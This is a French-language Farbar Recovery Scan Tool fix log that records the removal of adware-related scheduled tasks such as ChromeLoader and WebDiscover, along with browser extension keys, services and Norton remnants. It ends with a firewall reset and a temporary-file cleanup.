"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{1367EAFA-04AE-45FA-BA31-C9B499B5AA2F}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1367EAFA-04AE-45FA-BA31-C9B499B5AA2F}" => supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\WebDiscover Browser Update Task => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\WebDiscover Browser Update Task" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{16934497-0b98-468d-abca-ab7ca17b245d}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{185701D8-12F5-45BE-A386-879B6D58EBE8}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{185701D8-12F5-45BE-A386-879B6D58EBE8}" => supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\ChromeLoader => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ChromeLoader" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1b2d43b0-ade2-45d3-96f8-85837d2a7b1f}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{20e4e922-0318-48ab-85b9-539292f50e4f}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{21F52711-46EF-4A7F-90DF-A913755C1DAD}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{21F52711-46EF-4A7F-90DF-A913755C1DAD}" => supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\ChromiumUpdateTaskUserS-1-5-21-3716561713-2104721246-2030872134-1001Core => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ChromiumUpdateTaskUserS-1-5-21-3716561713-2104721246-2030872134-1001Core" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{2661757F-6017-4BDC-92C1-1D358A658513}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2661757F-6017-4BDC-92C1-1D358A658513}" => supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\iTop Screen Recorder Startup => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\iTop Screen Recorder Startup" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{2848052D-68D8-40F1-9FD5-CE6D475AE55A}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2848052D-68D8-40F1-9FD5-CE6D475AE55A}" => supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\Driver Booster Update => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Driver Booster Update" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{292cbfd4-2a0a-4644-a01a-2fb5fb18edd8}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{30FCD97D-E51B-412D-B62B-48BDF5ED0B34}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{30FCD97D-E51B-412D-B62B-48BDF5ED0B34}" => supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\iTopVPN_Scheduler_tibur => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\iTopVPN_Scheduler_tibur" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{33B2AF87-E6A6-4ABD-9C49-CA4CB2BFEEA8}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{33B2AF87-E6A6-4ABD-9C49-CA4CB2BFEEA8}" => supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\iTop Screenshot Update => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\iTop Screenshot Update" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{386e1974-844f-4c28-8a49-d0f0257175fd}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{3fadb0ef-ae5c-49e4-8ef1-7d9a66e6c9cb}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{413eb659-5bd1-408f-9653-e7a01792d867}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{49ea9ebb-3064-472d-98fd-752fa8919aa7}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{515EB30F-0378-4DB3-B1BC-DA02E6912813}" => non trouvé(e)
"C:\WINDOWS\System32\Tasks\Remediation\AntimalwareMigrationTask" => non trouvé(e)
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Remediation\AntimalwareMigrationTask" => non trouvé(e)
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{57C592B5-A6CF-4238-B24E-D4A6B96870A9}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{57C592B5-A6CF-4238-B24E-D4A6B96870A9}" => supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\iTop Screenshot SkipUAC (tibur) => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\iTop Screenshot SkipUAC (tibur)" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{601f51c0-1ed5-4d8d-b3d1-fc85674d85c2}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{63b68c26-5bd3-4645-8855-0bc0c0950d36}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{6BA1FBD7-93FE-4E1D-8704-280705685D05}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{6BA1FBD7-93FE-4E1D-8704-280705685D05}" => supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\WebDiscover Browser Launch Task => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\WebDiscover Browser Launch Task" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7192db81-d75a-4c5e-8269-0c3aa4c39900}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{732cfaee-b220-45a7-acbf-d6fa7ba38b67}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{7D156DB6-B628-451D-A130-131D10E25781}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7D156DB6-B628-451D-A130-131D10E25781}" => supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\npcapwatchdog => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\npcapwatchdog" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{83bbf89c-15ab-47d8-b9d7-214bd40da306}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{84F6B699-4A33-4C2F-AA59-0FBA0D2B4916}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{84F6B699-4A33-4C2F-AA59-0FBA0D2B4916}" => supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\iTop Screen Recorder Update => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\iTop Screen Recorder Update" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{878669a4-82de-4895-a60c-2de92613de8a}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{87B6CB79-3E75-4E41-8475-E1CF3BD6E4E3}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{87B6CB79-3E75-4E41-8475-E1CF3BD6E4E3}" => supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\iTop Screen Recorder SkipUAC (tibur) => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\iTop Screen Recorder SkipUAC (tibur)" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{9151416B-3700-4E80-B02A-DEC3B7F1B1E4}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{9151416B-3700-4E80-B02A-DEC3B7F1B1E4}" => supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\ChromiumUpdateTaskUserS-1-5-21-3716561713-2104721246-2030872134-1001UA => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ChromiumUpdateTaskUserS-1-5-21-3716561713-2104721246-2030872134-1001UA" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{9272455d-97be-4f3c-b3cf-6b85185ec08f}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{975cb8e3-3360-446b-8475-13d107b91a3d}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{9788F969-7F61-42C7-A1DC-19E5CDB61C19}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{9788F969-7F61-42C7-A1DC-19E5CDB61C19}" => supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\Driver Booster SkipUAC (tibur) => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Driver Booster SkipUAC (tibur)" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{9a1956e5-da63-48f8-b45d-b1c0cc306386}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{9F829F42-3CDC-4DCB-8EC6-0546BEF2B094}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{9F829F42-3CDC-4DCB-8EC6-0546BEF2B094}" => supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\OneDC_Updater => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\OneDC_Updater" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{A0F08F0F-74E8-4FE3-A4E3-6E1F98581174}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A0F08F0F-74E8-4FE3-A4E3-6E1F98581174}" => supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\iTop Screenshot Startup => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\iTop Screenshot Startup" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{b3b01422-0b36-4fc6-8738-bc19b11bdbbe}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{bdaeafb8-981f-4021-8e29-d49f455850ec}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{BEA8E94A-5026-41D5-AADA-41EFEFAED6BF}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{BEA8E94A-5026-41D5-AADA-41EFEFAED6BF}" => supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\Driver Booster Scheduler => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Driver Booster Scheduler" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{c4cdf14a-efb9-46ab-8114-848e4009b327}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{c7a5b2da-75aa-4bfb-925a-c6cc3c517829}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{C7FA37BC-F572-4A40-BCC1-1B8CCEE27E14}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C7FA37BC-F572-4A40-BCC1-1B8CCEE27E14}" => supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\iTop Screen Recorder UAC => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\iTop Screen Recorder UAC" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{c92080c9-1e5c-400e-90fd-1fdafb48ba66}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{cb03076e-7ac5-4e53-a829-6d98f1220db7}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{cefb7d27-b286-48b6-abd9-9fb1a6317f7c}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{D65A1A49-91D6-4A27-AEE4-F6F7CDF13549}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D65A1A49-91D6-4A27-AEE4-F6F7CDF13549}" => supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\iTopVPN_SkipUAC_tibur => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\iTopVPN_SkipUAC_tibur" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{d7c894d0-ee26-4f37-80e7-a5a8778644c5}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{e39afacb-dc89-442e-bbbf-2706a139d103}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{e9e342a0-f872-46e9-81b3-ddcdb373b7cb}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{eebab7aa-df46-4f8b-b2fe-69832d49d5f1}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{eff8dd23-ea3f-4ea0-b339-f86e6d5603be}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{F39BEAF6-8D93-4B18-9228-414A2A5F9468}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F39BEAF6-8D93-4B18-9228-414A2A5F9468}" => supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\iTopVPN_Update_tibur => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\iTopVPN_Update_tibur" => supprimé(es) avec succès
HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\Config\AutoFormFill_5ED10D46BD7E47DEB1F3685D2C0FCE08 => supprimé(es) avec succès
HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\Config\BookReader_B171F20233094AC88D05A8EF7B9763E8 => supprimé(es) avec succès
HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\Config\LearningTools_7706F933-971C-41D1-9899-8A026EB5D824 => supprimé(es) avec succès
HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\Config\PinJSAPI_EC01B57063BE468FAB6DB7EBFC3BF368 => supprimé(es) avec succès
HKU\S-1-5-21-3716561713-2104721246-2030872134-1001\SOFTWARE\Google\Chrome\Extensions\jdanfkhnfpagoijgfmklhgakdicpnfil => supprimé(es) avec succès
HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\mfhcmdonhekjhfbjmeacdjbhlfgpjabp => supprimé(es) avec succès
HKLM\System\CurrentControlSet\Services\OVRLibraryService => supprimé(es) avec succès
OVRLibraryService => service supprimé(es) avec succès
HKLM\System\CurrentControlSet\Services\nsvst_NGC => supprimé(es) avec succès
nsvst_NGC => service supprimé(es) avec succès
HKLM\System\CurrentControlSet\Services\SymEvnt => supprimé(es) avec succès
SymEvnt => service supprimé(es) avec succès
C:\Users\tibur\AppData\Local\Norton => déplacé(es) avec succès

========= netsh advfirewall reset =========

Ok.


========= Fin de CMD: =========


=========== EmptyTemp: ==========

BITS transfer queue => 0 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 168255018 B
Java, Flash, Steam htmlcache => 580238230 B
Windows/system/drivers => 119436551 B
Edge => 1212487 B
Chrome => 754390405 B
Firefox => 0 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 0 B
systemprofile32 => 0 B
LocalService => 205842 B
NetworkService => 865876 B
tibur => 345921114 B
OVRLibraryService => 345921114 B

RecycleBin => 0 B
EmptyTemp: => 2.2 GB données temporaires supprimées.

================================


Le système a dû redémarrer.

==== Fin de Fixlog 15:18:39 ====